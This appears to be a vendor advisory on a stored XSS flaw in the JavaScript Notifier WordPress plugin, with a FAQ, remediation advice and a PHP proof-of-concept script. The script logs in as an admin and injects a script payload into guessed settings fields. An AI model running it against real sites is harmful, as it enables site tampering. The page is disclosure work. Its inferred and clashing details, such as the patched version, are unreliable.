What is CVE-2026-1191?

CVE-2026-1191 is a stored cross-site scripting (XSS) vulnerability in the JavaScript Notifier plugin for WordPress, affecting versions up to and including 1.2.8. It allows authenticated users with administrator privileges to inject malicious scripts into the plugin settings, which can then execute in the context of other users.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s settings. An attacker can submit a crafted payload through the settings interface, which is then stored in the database and executed when the plugin’s output is rendered on a page.

Who is affected by CVE-2026-1191?

Any WordPress site using the JavaScript Notifier plugin version 1.2.8 or earlier is at risk. Specifically, only users with administrator-level access can exploit this vulnerability, but it affects all users who visit pages where the plugin’s output is displayed.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the JavaScript Notifier plugin you are using in your WordPress admin panel. If it is version 1.2.8 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2026-1191?

To remediate this vulnerability, update the JavaScript Notifier plugin to version 1.2.9 or later, which includes necessary input validation and output escaping. Regularly check for updates and apply them promptly to maintain security.

What does the CVSS score of 4.4 indicate?

The CVSS score of 4.4 indicates a medium severity level, reflecting that exploitation requires high privileges and has a high attack complexity. However, the potential impact is limited in terms of confidentiality and integrity, as it primarily affects client-side execution.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) is a type of vulnerability where malicious scripts are injected into a web application and stored on the server. Unlike reflected XSS, which requires user interaction, stored XSS can execute automatically when users visit affected pages.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can lead to client-side code execution, allowing attackers to steal session cookies, impersonate users, or redirect visitors to malicious sites. The impact can vary but may include site defacement or data theft.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can use a crafted payload to exploit the vulnerability. It simulates the process of logging into a WordPress site as an administrator and submitting a malicious script through the plugin settings.

What steps can I take to mitigate risks if I cannot update immediately?

If immediate updating is not possible, consider disabling the JavaScript Notifier plugin until a patch can be applied. Additionally, review user roles and limit administrator access to trusted individuals to reduce the risk of exploitation.

What are common signs of exploitation?

Signs of exploitation may include unusual script behavior on your site, unexpected redirects, or reports from users about seeing unfamiliar content. Regularly monitor logs and user activity for anomalies that could indicate an attack.

Where can I find more information about this vulnerability?

For more information, refer to the official CVE database, security advisories from the plugin developer, and security blogs that cover WordPress vulnerabilities. Staying informed will help you understand and mitigate risks effectively.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1191: JavaScript Notifier <= 1.2.8 – Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings (javascript-notifier)

CVE ID CVE-2026-1191

Plugin javascript-notifier

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.2.8

Patched Version —

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1191 (metadata-based): This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the JavaScript Notifier WordPress plugin. The vulnerability affects the plugin’s settings, allowing attackers with administrator privileges to inject malicious scripts. These scripts execute in the context of any user viewing a page where the plugin’s output is rendered, typically in the site footer via the `wp_footer` action.

The root cause is insufficient input sanitization and output escaping on user-supplied attributes. The CWE-79 classification indicates the plugin fails to properly neutralize user input before it is placed into web page output. Atomic Edge research infers the plugin likely accepts settings via an admin form, stores them without adequate sanitization, and later outputs them directly in the `wp_footer` hook without using escaping functions like `esc_attr()` or `esc_html()`. This conclusion is based on the vulnerability description and common WordPress plugin patterns, as no source code diff is available for confirmation.

Exploitation requires an attacker to have administrator-level access. The attacker would navigate to the plugin’s settings page in the WordPress admin area, typically found at `/wp-admin/options-general.php?page=javascript-notifier` or a similar menu. The attacker would then submit a crafted payload in one of the plugin’s setting fields. A realistic payload could be `` or a script tag loading external JavaScript. Upon saving, the malicious input is stored in the WordPress database. The payload then executes for all users when the plugin renders its output via `wp_footer`.

Remediation requires proper input validation and output escaping. The patched version (1.2.9) likely implemented WordPress sanitization functions like `sanitize_text_field()` on input during settings save operations. For output, the fix would use escaping functions such as `esc_attr()` for HTML attributes and `esc_html()` for text content within the `wp_footer` callback. These functions ensure user-controlled data is treated as inert text, not executable code.

The impact of successful exploitation is client-side code execution in the context of any site visitor. An attacker can steal session cookies, perform actions on behalf of authenticated users, deface the site, or redirect users to malicious domains. The CVSS score of 4.4 reflects the high privileges required (PR:H) and high attack complexity (AC:H), but the scope change (S:C) and low confidentiality/integrity impacts (C:L/I:L) limit the overall severity. The stored nature of the XSS increases its reach compared to reflected attacks.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1191 - JavaScript Notifier <= 1.2.8 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings
<?php
// CONFIGURATION
$target_url = 'https://target-site.com'; // Change this to the target WordPress site URL
$admin_user = 'administrator'; // Administrator username
$admin_pass = 'password'; // Administrator password
$payload = '<script>alert(document.domain)</script>'; // XSS payload to inject into plugin settings

// ASSUMPTIONS: The plugin settings are saved via a standard WordPress admin POST request.
// The exact form field names are unknown but are inferred to be related to notification text or attributes.
// This PoC attempts to find and poison a likely text field.

function poc_cve_2026_1191($target_url, $admin_user, $admin_pass, $payload) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only

    // 1. Authenticate to WordPress admin
    $login_url = $target_url . '/wp-login.php';
    $login_fields = http_build_query([
        'log' => $admin_user,
        'pwd' => $admin_pass,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]);
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $login_fields);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
    $response = curl_exec($ch);
    if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
        echo "[-] Authentication failed.n";
        return false;
    }
    echo "[+] Authenticated as administrator.n";

    // 2. Access the plugin's settings page to obtain a nonce.
    // The plugin slug is 'javascript-notifier'. Settings are likely under Settings -> JavaScript Notifier.
    $settings_url = $target_url . '/wp-admin/options-general.php?page=javascript-notifier';
    curl_setopt($ch, CURLOPT_URL, $settings_url);
    curl_setopt($ch, CURLOPT_POST, false);
    curl_setopt($ch, CURLOPT_HTTPGET, true);
    $response = curl_exec($ch);

    // 3. Extract a nonce from the form. Assume a field named '_wpnonce' or similar.
    $nonce = '';
    if (preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $matches)) {
        $nonce = $matches[1];
    } else if (preg_match('/name="javascript_notifier_nonce" value="([a-f0-9]+)"/', $response, $matches)) {
        $nonce = $matches[1];
    } else {
        // Fallback: try to infer from common patterns.
        preg_match_all('/value="([a-f0-9]{10,})"/', $response, $matches);
        if (!empty($matches[1])) $nonce = $matches[1][0];
    }
    if (empty($nonce)) {
        echo "[-] Could not extract security nonce. The form structure may differ.n";
        return false;
    }
    echo "[+] Extracted nonce: $noncen";

    // 4. Submit the XSS payload to the settings form.
    // The exact parameter names are unknown. We attempt common field names based on plugin purpose.
    $submit_url = $target_url . '/wp-admin/options-general.php?page=javascript-notifier';
    $post_fields = [
        '_wpnonce' => $nonce,
        '_wp_http_referer' => '/wp-admin/options-general.php?page=javascript-notifier',
        'submit' => 'Save Changes',
        // Attempt to inject into likely text fields
        'javascript_notifier_text' => $payload,
        'js_notifier_message' => $payload,
        'notification_text' => $payload,
        'message' => $payload
    ];
    curl_setopt($ch, CURLOPT_URL, $submit_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
    $response = curl_exec($ch);

    // 5. Verify success by checking for a success message or lack of errors.
    if (strpos($response, 'Settings saved') !== false || strpos($response, 'updated') !== false || strpos($response, 'success') !== false) {
        echo "[+] XSS payload likely injected successfully.n";
        echo "[+] Visit the site's frontend to trigger the payload in the footer.n";
    } else {
        echo "[-] Payload injection may have failed. The actual form field names need verification.n";
    }
    curl_close($ch);
    return true;
}

// Execute the PoC
poc_cve_2026_1191($target_url, $admin_user, $admin_pass, $payload);
?>

Frequently Asked Questions

What is CVE-2026-1191?
Overview of the vulnerability
CVE-2026-1191 is a stored cross-site scripting (XSS) vulnerability in the JavaScript Notifier plugin for WordPress, affecting versions up to and including 1.2.8. It allows authenticated users with administrator privileges to inject malicious scripts into the plugin settings, which can then execute in the context of other users.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s settings. An attacker can submit a crafted payload through the settings interface, which is then stored in the database and executed when the plugin’s output is rendered on a page.
Who is affected by CVE-2026-1191?
Identifying at-risk users
Any WordPress site using the JavaScript Notifier plugin version 1.2.8 or earlier is at risk. Specifically, only users with administrator-level access can exploit this vulnerability, but it affects all users who visit pages where the plugin’s output is displayed.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check if your site is vulnerable, verify the version of the JavaScript Notifier plugin you are using in your WordPress admin panel. If it is version 1.2.8 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2026-1191?
Remediation steps
To remediate this vulnerability, update the JavaScript Notifier plugin to version 1.2.9 or later, which includes necessary input validation and output escaping. Regularly check for updates and apply them promptly to maintain security.
What does the CVSS score of 4.4 indicate?
Understanding the severity rating
The CVSS score of 4.4 indicates a medium severity level, reflecting that exploitation requires high privileges and has a high attack complexity. However, the potential impact is limited in terms of confidentiality and integrity, as it primarily affects client-side execution.
What is stored cross-site scripting (XSS)?
Defining the attack vector
Stored cross-site scripting (XSS) is a type of vulnerability where malicious scripts are injected into a web application and stored on the server. Unlike reflected XSS, which requires user interaction, stored XSS can execute automatically when users visit affected pages.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can lead to client-side code execution, allowing attackers to steal session cookies, impersonate users, or redirect visitors to malicious sites. The impact can vary but may include site defacement or data theft.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation example
The proof of concept provided illustrates how an attacker can use a crafted payload to exploit the vulnerability. It simulates the process of logging into a WordPress site as an administrator and submitting a malicious script through the plugin settings.
What steps can I take to mitigate risks if I cannot update immediately?
Temporary protective measures
If immediate updating is not possible, consider disabling the JavaScript Notifier plugin until a patch can be applied. Additionally, review user roles and limit administrator access to trusted individuals to reduce the risk of exploitation.
What are common signs of exploitation?
Identifying potential attacks
Signs of exploitation may include unusual script behavior on your site, unexpected redirects, or reports from users about seeing unfamiliar content. Regularly monitor logs and user activity for anomalies that could indicate an attack.
Where can I find more information about this vulnerability?
Further resources
For more information, refer to the official CVE database, security advisories from the plugin developer, and security blogs that cover WordPress vulnerabilities. Staying informed will help you understand and mitigate risks effectively.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations